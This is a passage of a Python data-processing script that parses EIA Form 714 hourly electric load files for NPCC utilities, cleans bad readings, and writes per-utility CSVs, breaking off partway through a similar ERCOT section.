"MIT"
] | 2 | 2015-05-13T23:29:03.000Z | 2015-05-21T22:50:15.000Z | import numpy as np
import pandas as pd
import os
import datetime
# Current user's home directory (portable across machines).
homedir = os.path.expanduser('~')
# Root of the processed EIA Form 714 hourly-load dumps, organised as
# <region>/<year>/<utility-file> (e.g. npcc/1993/BECO93).
datadir = 'github/RIPS_kircheis/data/eia_form_714/processed/'
fulldir = homedir + '/' + datadir
# li = []
# for d1 in os.listdir('.'):
# for fn in os.listdir('./%s' % d1):
# li.append(fn)
# dir_u = pd.Series(li).str[:-2].order().unique()
###### NPCC
# BECO: 54913 <- 1998
# BHE: 1179
# CELC: 1523 <- 2886
# CHGE: 3249
# CMP: 3266
# COED: 4226
# COEL: 4089 -> IGNORE
# CVPS: 3292
# EUA: 5618
# GMP: 7601
# ISONY: 13501
# LILC: 11171 <- 11172
# MMWE: 11806
# NEES: 13433
# NEPOOL: 13435
# NMPC: 13573
# NU: 13556
# NYPA: 15296
# NYPP: 13501
# NYS: 13511
# OR: 14154
# RGE: 16183
# UI: 19497
# Hourly load series for NPCC-region FERC Form 714 respondents.
# Outer key: FERC respondent ID; inner key: report year; leaf: a flat
# array of that year's hourly load readings, parsed from the raw filing
# (formats vary wildly per utility and per year, hence the per-file
# parser arguments).
# BUGFIX: the original dict literal listed key 13501 TWICE (ISONY
# 2002-2004, then NYPP 1993).  Duplicate keys in a dict literal keep
# only the last value, so the ISONY years were silently discarded.
# Both filings are the same respondent; the years are merged into a
# single 13501 entry below.
npcc = {
    54913 : {  # BECO
        1993 : pd.read_fwf('%s/npcc/1993/BECO93' % (fulldir), header=None, skipfooter=1).loc[:, 2:].values.ravel(),
        1994 : pd.read_csv('%s/npcc/1994/BECO94' % (fulldir), sep =' ', skipinitialspace=True, header=None, skipfooter=1)[4].values,
        1995 : pd.read_csv('%s/npcc/1995/BECO95' % (fulldir), sep =' ', skipinitialspace=True, header=None)[4].values,
        1996 : pd.read_csv('%s/npcc/1996/BECO96' % (fulldir), sep =' ', skipinitialspace=True, header=None)[4].values,
        1997 : pd.read_csv('%s/npcc/1997/BECO97' % (fulldir), sep =' ', skipinitialspace=True, header=None, skipfooter=1)[4].values,
        1998 : pd.read_csv('%s/npcc/1998/BECO98' % (fulldir), sep =' ', skipinitialspace=True, header=None)[4].values,
        1999 : pd.read_csv('%s/npcc/1999/BECO99' % (fulldir), sep =' ', skipinitialspace=True, header=None, skiprows=3)[4].values,
        2000 : pd.read_csv('%s/npcc/2000/BECO00' % (fulldir), sep =' ', skipinitialspace=True, header=None, skiprows=3)[4].values,
        2001 : pd.read_csv('%s/npcc/2001/BECO01' % (fulldir), sep =' ', skipinitialspace=True, header=None, skiprows=3)[4].values,
        2002 : pd.read_csv('%s/npcc/2002/BECO02' % (fulldir), sep =' ', skipinitialspace=True, header=None, skiprows=3)[4].values,
        2003 : pd.read_csv('%s/npcc/2003/BECO03' % (fulldir), sep =' ', skipinitialspace=True, header=None, skiprows=3)[4].values,
        2004 : pd.read_csv('%s/npcc/2004/BECO04' % (fulldir), sep =' ', skipinitialspace=True, header=None, skiprows=3)[4].values
    },
    1179 : {  # BHE
        1993 : pd.read_csv('%s/npcc/1993/BHE93' % (fulldir), sep=' ', skiprows=2, skipinitialspace=True).loc[:, '0000':].values.ravel(),
        1994 : pd.read_csv('%s/npcc/1994/BHE94' % (fulldir)).dropna(how='all').loc[:729, '1/13':'12/24'].values.ravel(),
        1995 : (pd.read_fwf('%s/npcc/1995/BHE95' % (fulldir)).loc[:729, '1/13':'1224'].astype(float)/10).values.ravel(),
        2001 : pd.read_excel('%s/npcc/2001/BHE01' % (fulldir), skiprows=2).iloc[:, 1:24].values.ravel(),
        2003 : pd.read_excel('%s/npcc/2003/BHE03' % (fulldir), skiprows=3).iloc[:, 1:24].values.ravel()
    },
    1523 : {  # CELC
        1999 : pd.read_csv('%s/npcc/1999/CELC99' % (fulldir), skiprows=3, sep=' ', skipinitialspace=True, header=None)[4].values,
        2000 : pd.read_csv('%s/npcc/2000/CELC00' % (fulldir), skiprows=3, sep=' ', skipinitialspace=True, header=None)[4].values,
        2001 : pd.read_csv('%s/npcc/2001/CELC01' % (fulldir), skiprows=3, sep=' ', skipinitialspace=True, header=None)[4].values,
        2002 : pd.read_csv('%s/npcc/2002/CELC02' % (fulldir), skiprows=3, sep=' ', skipinitialspace=True, header=None)[4].values,
        2003 : pd.read_csv('%s/npcc/2003/CELC03' % (fulldir), skiprows=3, sep=' ', skipinitialspace=True, header=None)[4].values,
        2004 : pd.read_csv('%s/npcc/2004/CELC04' % (fulldir), skiprows=3, sep=' ', skipinitialspace=True, header=None)[4].values
    },
    3249 : {  # CHGE
        1993 : pd.read_csv('%s/npcc/1993/CHGE93' % (fulldir), sep =' ', skipinitialspace=True, header=None, skipfooter=1)[2].values,
        1994 : pd.read_fwf('%s/npcc/1994/CHGE94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].astype(float).values.ravel(),
        1995 : pd.read_fwf('%s/npcc/1995/CHGE95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        1996 : pd.read_fwf('%s/npcc/1996/CHGE96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].astype(float).values.ravel(),
        1997 : pd.read_csv('%s/npcc/1997/CHGE97' % (fulldir), sep ='\s', skipinitialspace=True, header=None, skipfooter=1).iloc[:, 4:].values.ravel(),
        1998 : pd.read_excel('%s/npcc/1998/CHGE98' % (fulldir), skipfooter=1, header=None).iloc[:, 2:].values.ravel(),
    },
    3266 : {  # CMP
        1993 : pd.read_fwf('%s/npcc/1993/CMP93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
        1994 : pd.read_fwf('%s/npcc/1994/CMP94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
        1995 : pd.read_fwf('%s/npcc/1995/CMP95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
        1996 : pd.read_fwf('%s/npcc/1996/CMP96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
        1997 : pd.read_fwf('%s/npcc/1997/CMP97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
        1999 : pd.read_fwf('%s/npcc/1999/CMP99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
        2002 : pd.read_fwf('%s/npcc/2002/CMP02' % (fulldir), header=None).iloc[:, 1:].values.ravel(),
        2003 : pd.read_fwf('%s/npcc/2003/CMP03' % (fulldir), header=None).iloc[:, 1:].values.ravel()
    },
    4226 : {  # COED
        1993 : pd.read_csv('%s/npcc/1993/COED93' % (fulldir), skipfooter=1, skiprows=11, header=None, skipinitialspace=True, sep=' ')[2].values,
        1994 : pd.read_fwf('%s/npcc/1994/COED94' % (fulldir), skipfooter=1, header=None)[1].values,
        1995 : pd.read_csv('%s/npcc/1995/COED95' % (fulldir), skiprows=3, header=None),
        1996 : pd.read_excel('%s/npcc/1996/COED96' % (fulldir)).iloc[:, -1].values.ravel(),
        1997 : pd.read_excel('%s/npcc/1997/COED97' % (fulldir), skiprows=1).iloc[:, -1].values.ravel(),
        1998 : pd.read_excel('%s/npcc/1998/COED98' % (fulldir), skiprows=1).iloc[:, -1].values.ravel(),
        1999 : pd.read_csv('%s/npcc/1999/COED99' % (fulldir), skiprows=1, sep='\t').iloc[:, -1].str.replace(',', '').astype(int).values.ravel(),
        2000 : pd.read_csv('%s/npcc/2000/COED00' % (fulldir), sep='\t')[' Load '].dropna().str.replace(',', '').astype(int).values.ravel(),
        2001 : pd.read_csv('%s/npcc/2001/COED01' % (fulldir), sep='\t', skipfooter=1)['Load'].dropna().str.replace(',', '').astype(int).values.ravel(),
        2002 : pd.read_csv('%s/npcc/2002/COED02' % (fulldir), sep='\t', skipfooter=1, skiprows=1)['Load'].dropna().str.replace(',', '').astype(int).values.ravel(),
        2003 : pd.read_csv('%s/npcc/2003/COED03' % (fulldir), sep='\t')['Load'].dropna().astype(int).values.ravel(),
        2004 : pd.read_csv('%s/npcc/2004/COED04' % (fulldir), header=None).iloc[:, -1].str.replace('[A-Z,]', '').str.replace('\s', '0').astype(int).values.ravel()
    },
    4089 : {  # COEL
        1993 : pd.read_fwf('%s/npcc/1993/COEL93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
        1995 : pd.read_fwf('%s/npcc/1995/COEL95' % (fulldir), header=None).iloc[:, 1:].values.ravel(),
        1996 : pd.read_csv('%s/npcc/1996/COEL96' % (fulldir), sep=' ', skipinitialspace=True, header=None)[3].values,
        1997 : pd.read_csv('%s/npcc/1997/COEL97' % (fulldir), sep=' ', skipinitialspace=True, header=None)[4].values,
        1998 : pd.read_csv('%s/npcc/1998/COEL98' % (fulldir), sep=' ', skipinitialspace=True, header=None)[4].values,
        1999 : pd.read_csv('%s/npcc/1999/COEL99' % (fulldir), sep=' ', skipinitialspace=True, header=None, skiprows=3)[4].values,
        2000 : pd.read_csv('%s/npcc/2000/COEL00' % (fulldir), sep=' ', skipinitialspace=True, header=None, skiprows=3)[4].values,
        2001 : pd.read_csv('%s/npcc/2001/COEL01' % (fulldir), sep=' ', skipinitialspace=True, header=None, skiprows=3)[4].values,
        2002 : pd.read_csv('%s/npcc/2002/COEL02' % (fulldir), sep=' ', skipinitialspace=True, header=None, skiprows=3)[4].values,
        2003 : pd.read_csv('%s/npcc/2003/COEL03' % (fulldir), sep=' ', skipinitialspace=True, header=None, skiprows=3)[4].values,
        2004 : pd.read_csv('%s/npcc/2004/COEL04' % (fulldir), sep=' ', skipinitialspace=True, header=None, skiprows=3)[4].values
    },
    3292 : {  # CVPS
        1995 : pd.read_fwf('%s/npcc/1995/CVPS95' % (fulldir), header=None).iloc[:, 1:].values.ravel(),
        1996 : pd.read_csv('%s/npcc/1996/CVPS96' % (fulldir), header=None, skipfooter=1)[1].values,
        1997 : pd.read_csv('%s/npcc/1997/CVPS97' % (fulldir), header=None)[2].values,
        1998 : pd.read_csv('%s/npcc/1998/CVPS98' % (fulldir), header=None, skipfooter=1)[4].values,
        1999 : pd.read_csv('%s/npcc/1999/CVPS99' % (fulldir))['Load'].values
    },
    5618 : {  # EUA
        1993 : pd.read_fwf('%s/npcc/1993/EUA93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
        1994 : pd.read_fwf('%s/npcc/1994/EUA94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
        1995 : pd.read_fwf('%s/npcc/1995/EUA95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
        1996 : pd.read_fwf('%s/npcc/1996/EUA96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
        1997 : pd.read_fwf('%s/npcc/1997/EUA97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
        1999 : pd.read_fwf('%s/npcc/1999/EUA99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel()
    },
    7601 : {  # GMP
        1993 : pd.read_csv('%s/npcc/1993/GMP93' % (fulldir), sep=' ', skipinitialspace=True, header=None, skiprows=4)[0].replace('MWH', '0').astype(float).values.ravel(),
        1994 : pd.read_fwf('%s/npcc/1994/GMP94' % (fulldir), header=None)[0].values,
        1995 : pd.read_csv('%s/npcc/1995/GMP95' % (fulldir), sep=' ', skipinitialspace=True, header=None)[0].values,
        1996 : pd.read_csv('%s/npcc/1996/GMP96' % (fulldir), sep='\t', skipinitialspace=True, header=None)[0].values,
        1997 : pd.read_csv('%s/npcc/1997/GMP97' % (fulldir), sep='\t', skipinitialspace=True, header=None)[0].values,
        1998 : pd.read_csv('%s/npcc/1998/GMP98' % (fulldir), sep='\t', skipinitialspace=True, header=None)[0].astype(str).str[:3].astype(float).values,
        1999 : pd.read_csv('%s/npcc/1999/GMP99' % (fulldir), sep=' ', skipinitialspace=True, header=None, skipfooter=1).iloc[:8760, 0].values,
        2002 : pd.read_excel('%s/npcc/2002/GMP02' % (fulldir), skiprows=6, skipfooter=1).iloc[:, 0].values,
        2003 : pd.read_excel('%s/npcc/2003/GMP03' % (fulldir), skiprows=6, skipfooter=1).iloc[:, 0].values,
        2004 : pd.read_csv('%s/npcc/2004/GMP04' % (fulldir), skiprows=13, sep='\s').iloc[:, 0].values
    },
    13501 : {  # NYPP (1993 filing) / ISONY (2002-2004 filings) -- same respondent, merged
        1993 : pd.read_fwf('%s/npcc/1993/NYPP93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
        2002 : pd.read_csv('%s/npcc/2002/ISONY02' % (fulldir), sep='\t')['mw'].values,
        2003 : pd.read_excel('%s/npcc/2003/ISONY03' % (fulldir))['Load'].values,
        2004 : pd.read_excel('%s/npcc/2004/ISONY04' % (fulldir)).loc[:, 'HR1':].values.ravel()
    },
    11171 : {  # LILC
        1994 : pd.read_fwf('%s/npcc/1994/LILC94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
        1995 : pd.read_fwf('%s/npcc/1995/LILC95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        1997 : pd.read_fwf('%s/npcc/1997/LILC97' % (fulldir), skiprows=4, widths=[8,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
    },
    11806 : {  # MMWE
        1998 : pd.read_fwf('%s/npcc/1998/MMWE98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skiprows=1).iloc[:, 1:].values.ravel(),
        1999 : pd.read_fwf('%s/npcc/1999/MMWE99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skiprows=1).iloc[:, 1:].values.ravel(),
        2000 : pd.read_fwf('%s/npcc/2000/MMWE00' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skiprows=1).iloc[:, 1:].values.ravel(),
        2001 : pd.read_fwf('%s/npcc/2001/MMWE01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skiprows=1).iloc[:, 1:].values.ravel(),
        2002 : pd.read_fwf('%s/npcc/2002/MMWE02' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skiprows=1).iloc[:, 1:].values.ravel(),
        2003 : pd.read_fwf('%s/npcc/2003/MMWE03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skiprows=1).iloc[:, 1:].values.ravel(),
        2004 : pd.read_fwf('%s/npcc/2004/MMWE04' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skiprows=1).iloc[:, 1:].values.ravel()
    },
    13433 : {  # NEES
        1993 : pd.read_fwf('%s/npcc/1993/NEES93' % (fulldir), widths=(8,7), header=None, skipfooter=1)[1].values,
        1994 : pd.read_csv('%s/npcc/1994/NEES94' % (fulldir), header=None, skipfooter=1, sep=' ', skipinitialspace=True)[3].values
    },
    13435 : {  # NEPOOL
        1993 : pd.read_fwf('%s/npcc/1993/NEPOOL93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skiprows=2).iloc[:, 1:].values.ravel(),
        1994 : pd.read_fwf('%s/npcc/1994/NEPOOL94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        1995 : pd.read_fwf('%s/npcc/1995/NEPOOL95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skiprows=3).iloc[:, 1:].values.ravel(),
        1996 : pd.read_csv('%s/npcc/1996/NEPOOL96' % (fulldir), sep=' ', skipinitialspace=True, header=None)[1].values,
        1997 : pd.read_fwf('%s/npcc/1997/NEPOOL97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        1998 : pd.read_excel('%s/npcc/1998/NEPOOL98' % (fulldir), header=None).iloc[:, 5:17].values.ravel(),
        1999 : pd.read_csv('%s/npcc/1999/NEPOOL99' % (fulldir), engine='python', skiprows=1).iloc[:, 0].values,
        2000 : pd.read_fwf('%s/npcc/2000/NEPOOL00' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        2001 : pd.read_fwf('%s/npcc/2001/NEPOOL01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        2002 : pd.read_csv('%s/npcc/2002/NEPOOL02' % (fulldir), sep='\t').iloc[:, 3:].values.ravel(),
        2003 : pd.read_fwf('%s/npcc/2003/NEPOOL03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        2004 : pd.read_csv('%s/npcc/2004/NEPOOL04' % (fulldir), sep='\t', header=None, skiprows=10).iloc[:, 5:].values.ravel()
    },
    13573 : {  # NMPC
        1993 : pd.read_csv('%s/npcc/1993/NMPC93' % (fulldir), skiprows=11, header=None, sep=' ', skipinitialspace=True).iloc[:, 3:27].values.ravel(),
        1995 : pd.read_fwf('%s/npcc/1995/NMPC95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        1996 : pd.read_fwf('%s/npcc/1996/NMPC96' % (fulldir), header=None).iloc[:, 2:14].astype(int).values.ravel(),
        1998 : pd.read_fwf('%s/npcc/1998/NMPC98' % (fulldir), header=None).iloc[:, 2:].astype(int).values.ravel(),
        1999 : pd.read_fwf('%s/npcc/1999/NMPC99' % (fulldir), header=None).iloc[:, 2:14].astype(int).values.ravel(),
        2000 : pd.read_excel('%s/npcc/2000/NMPC00' % (fulldir), sheetname=1, skiprows=10, skipfooter=3).iloc[:, 1:].values.ravel(),
        2002 : pd.read_excel('%s/npcc/2002/NMPC02' % (fulldir), sheetname=1, skiprows=2, header=None).iloc[:, 2:].values.ravel(),
        2003 : pd.concat([pd.read_excel('%s/npcc/2003/NMPC03' % (fulldir), sheetname=i, skiprows=1, header=None) for i in range(1,13)]).iloc[:, 2:].astype(str).apply(lambda x: x.str[:4]).astype(float).values.ravel()
    },
    13556 : {  # NU
        1993 : pd.read_fwf('%s/npcc/1993/NU93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
        1994 : pd.read_excel('%s/npcc/1994/NU94' % (fulldir), header=None, skipfooter=1).iloc[:, 3:].values.ravel(),
        1995 : pd.read_excel('%s/npcc/1995/NU95' % (fulldir), header=None, skipfooter=5).dropna(how='any').iloc[:, 3:].values.ravel(),
        1996 : pd.read_excel('%s/npcc/1996/NU96' % (fulldir), header=None, skipfooter=1).iloc[:, 5:].values.ravel(),
        1997 : pd.read_excel('%s/npcc/1997/NU97' % (fulldir), header=None, skipfooter=4).iloc[:, 5:].values.ravel(),
        1998 : pd.read_excel('%s/npcc/1998/NU98' % (fulldir), header=None).iloc[:, 5:].values.ravel(),
        1999 : pd.read_excel('%s/npcc/1999/NU99' % (fulldir), header=None).iloc[:, 5:].values.ravel(),
        2000 : pd.read_csv('%s/npcc/2000/NU00' % (fulldir), sep='\t', header=None).iloc[:, 5:].values.ravel(),
        2001 : pd.read_excel('%s/npcc/2001/NU01' % (fulldir)).iloc[:, -1].values,
        2002 : pd.read_excel('%s/npcc/2002/NU02' % (fulldir)).iloc[:, -1].values,
        2003 : pd.read_excel('%s/npcc/2003/NU03' % (fulldir), skipfooter=1).iloc[:, -1].values
    },
    15296 : {  # NYPA
        1993 : pd.read_csv('%s/npcc/1993/NYPA93' % (fulldir), engine='python', header=None).values.ravel(),
        1994 : pd.read_csv('%s/npcc/1994/NYPA94' % (fulldir), engine='python', header=None).values.ravel(),
        1995 : pd.read_csv('%s/npcc/1995/NYPA95' % (fulldir), engine='python', header=None).values.ravel(),
        1996 : pd.read_csv('%s/npcc/1996/NYPA96' % (fulldir), engine='python', header=None).values.ravel(),
        1997 : pd.read_csv('%s/npcc/1997/NYPA97' % (fulldir), engine='python', header=None).values.ravel(),
        1998 : pd.read_csv('%s/npcc/1998/NYPA98' % (fulldir), engine='python', header=None).values.ravel(),
        1999 : pd.read_excel('%s/npcc/1999/NYPA99' % (fulldir), header=None).values.ravel(),
        2000 : pd.read_csv('%s/npcc/2000/NYPA00' % (fulldir), engine='python', header=None).values.ravel(),
        2001 : pd.read_csv('%s/npcc/2001/NYPA01' % (fulldir), engine='python', header=None).values.ravel(),
        2002 : pd.read_csv('%s/npcc/2002/NYPA02' % (fulldir), engine='python', header=None).values.ravel(),
        2003 : pd.read_csv('%s/npcc/2003/NYPA03' % (fulldir), engine='python', header=None).values.ravel()
    },
    13511 : {  # NYS
        1996 : pd.read_fwf('%s/npcc/1996/NYS96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        1997 : pd.read_fwf('%s/npcc/1997/NYS97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        1999 : pd.read_excel('%s/npcc/1999/NYS99' % (fulldir)).iloc[:, 1:].values.ravel(),
        2000 : pd.read_csv('%s/npcc/2000/NYS00' % (fulldir), sep='\t').iloc[:, -1].values,
        2001 : pd.read_csv('%s/npcc/2001/NYS01' % (fulldir), sep='\t', skiprows=3).dropna(how='all').iloc[:, -1].values,
        2002 : pd.read_csv('%s/npcc/2002/NYS02' % (fulldir), sep=' ', skipinitialspace=True, skiprows=3).iloc[:, 2].values,
        2003 : pd.read_csv('%s/npcc/2003/NYS03' % (fulldir), sep=' ', skipinitialspace=True, skiprows=5, header=None).iloc[:, -1].values,
        2004 : pd.read_csv('%s/npcc/2004/NYS04' % (fulldir), sep=' ', skipinitialspace=True, skiprows=5, header=None).dropna(how='all').iloc[:, -1].values
    },
    14154 : {  # OR
        1993 : pd.read_csv('%s/npcc/1993/OR93' % (fulldir), skiprows=5, header=None).iloc[:, 2:26].values.ravel(),
        1995 : (pd.read_csv('%s/npcc/1995/OR95' % (fulldir), header=None).iloc[:, 1:25].values.ravel()/10),
        1996 : (pd.read_csv('%s/npcc/1996/OR96' % (fulldir), header=None).iloc[:, 1:25].values.ravel()/10),
        1997 : (pd.read_csv('%s/npcc/1997/OR97' % (fulldir), header=None).iloc[:, 1:25].values.ravel()/10),
        1998 : pd.read_fwf('%s/npcc/1998/OR98' % (fulldir), skiprows=1, header=None).dropna(axis=1, how='all').iloc[:, 1:].values.ravel(),
        1999 : pd.read_csv('%s/npcc/1999/OR99' % (fulldir), sep='\t', skiprows=1, header=None).iloc[:, 1:].values.ravel(),
        2000 : pd.read_csv('%s/npcc/2000/OR00' % (fulldir), sep='\t').iloc[:, -1].values.astype(int).ravel(),
        2002 : pd.read_csv('%s/npcc/2002/OR02' % (fulldir), sep='\t', skiprows=2).iloc[:, -1].dropna().values.astype(int).ravel(),
        2003 : pd.read_csv('%s/npcc/2003/OR03' % (fulldir), sep='\t').iloc[:, -1].dropna().values.astype(int).ravel(),
        2004 : pd.read_csv('%s/npcc/2004/OR04' % (fulldir), header=None).iloc[:, -1].values.astype(int).ravel()
    },
    16183 : {  # RGE
        1994 : pd.read_fwf('%s/npcc/1994/RGE94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        1995 : pd.read_fwf('%s/npcc/1995/RGE95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        1996 : pd.read_fwf('%s/npcc/1996/RGE96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        2002 : pd.read_csv('%s/npcc/2002/RGE02' % (fulldir), skiprows=4, sep=' ', skipinitialspace=True).dropna(axis=1, how='all').iloc[:, -1].values,
        2003 : pd.read_csv('%s/npcc/2003/RGE03' % (fulldir), skiprows=4, sep=' ', skipinitialspace=True).dropna(axis=1, how='all').iloc[:, -1].values,
        2004 : pd.read_csv('%s/npcc/2004/RGE04' % (fulldir), skiprows=4, sep=' ', skipinitialspace=True).dropna(axis=1, how='all').iloc[:, -1].values
    },
    19497 : {  # UI
        1993 : pd.read_fwf('%s/npcc/1993/UI93' % (fulldir), header=None, skipfooter=1).iloc[:, 1:].values.ravel()/10,
        1994 : pd.read_fwf('%s/npcc/1994/UI94' % (fulldir), header=None, skipfooter=1).iloc[:, 1:].values.ravel()/10,
        1995 : pd.read_fwf('%s/npcc/1995/UI95' % (fulldir), header=None, skipfooter=1).iloc[:, 1:].values.ravel()/10,
        1996 : pd.read_fwf('%s/npcc/1996/UI96' % (fulldir), header=None, skipfooter=1).iloc[:, 1:].values.ravel()/10,
        1997 : pd.read_fwf('%s/npcc/1997/UI97' % (fulldir), header=None, skipfooter=1).iloc[:, 1:].values.ravel()/10,
        1998 : pd.read_excel('%s/npcc/1998/UI98' % (fulldir))['MW'].values,
        1999 : pd.read_excel('%s/npcc/1999/UI99' % (fulldir)).loc[:, 'HR1':'HR24'].values.ravel(),
        2001 : pd.read_excel('%s/npcc/2001/UI01' % (fulldir), sheetname=0).ix[:-2, 'HR1':'HR24'].values.ravel(),
        2002 : pd.read_excel('%s/npcc/2002/UI02' % (fulldir), sheetname=0).ix[:-2, 'HR1':'HR24'].values.ravel(),
        2003 : pd.read_excel('%s/npcc/2003/UI03' % (fulldir), sheetname=0, skipfooter=2).ix[:, 'HR1':'HR24'].values.ravel(),
        2004 : pd.read_excel('%s/npcc/2004/UI04' % (fulldir), sheetname=0, skipfooter=1).ix[:, 'HR1':'HR24'].values.ravel()
    }
}
# --- Post-processing fixes for bad readings in the raw NPCC series ---

# COED 1995 came as two partial columns; splice them into one series.
npcc[4226][1995] = pd.concat([npcc[4226][1995][2].dropna(), npcc[4226][1995][6]]).values.ravel()

# Zero out implausible spikes above 5000 (transcription/parse artifacts).
for util_id, yr in ((3249, 1994), (3249, 1996), (15296, 2000), (15296, 2001)):
    npcc[util_id][yr][npcc[util_id][yr] > 5000] = 0

# COEL 1998 is unusable; blank the whole year.
npcc[4089][1998] = np.repeat(np.nan, len(npcc[4089][1998]))

# Zero out implausibly low NYS readings (below 500).
for yr in (1996, 1997, 1999, 2000):
    npcc[13511][yr][npcc[13511][yr] < 500] = 0

npcc[14154][2002][npcc[14154][2002] > 2000] = 0

if not os.path.exists('./npcc'):
    os.mkdir('npcc')

# Write one CSV per utility: hourly datetime index plus a 'load' column;
# zeros (our bad-data sentinel) become NaN.
for util_id in npcc.keys():
    print(util_id)
    series = pd.concat(
        [pd.Series(npcc[util_id][yr],
                   index=pd.date_range(start=datetime.date(yr, 1, 1),
                                       freq='h',
                                       periods=len(npcc[util_id][yr])))
         for yr in npcc[util_id].keys()]
    ).sort_index()
    frame = pd.DataFrame(series, columns=['load'])
    frame['load'] = frame['load'].replace('.', '0').astype(float).replace(0, np.nan)
    frame.to_csv('./npcc/%s.csv' % util_id)
###### ERCOT
# AUST: 1015
# CPL: 3278
# HLP: 8901
# LCRA: 11269
# NTEC: 13670
# PUB: 2409
# SRGT: 40233
# STEC: 17583
# TUEC: 44372
# TMPP: 18715
# TXLA: 18679
# WTU: 20404
# Hourly load series for ERCOT-region FERC Form 714 respondents.
# Outer key: FERC respondent ID; inner key: report year; leaf: a flat
# array of that year's hourly load readings.  1998-2000 come from pooled
# ERCOT workbooks (kWh, hence the /1000 to MW -- presumably; confirm
# units against the raw files); earlier years are per-utility text dumps.
ercot = {
    1015 : {  # AUST
        1993 : pd.read_fwf('%s/ercot/1993/AUST93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        1994 : pd.read_fwf('%s/ercot/1994/AUST94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        1995 : pd.read_fwf('%s/ercot/1995/AUST95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        1996 : pd.read_fwf('%s/ercot/1996/AUST96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
        1997 : pd.read_fwf('%s/ercot/1997/AUST97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, 1:].values.ravel(),
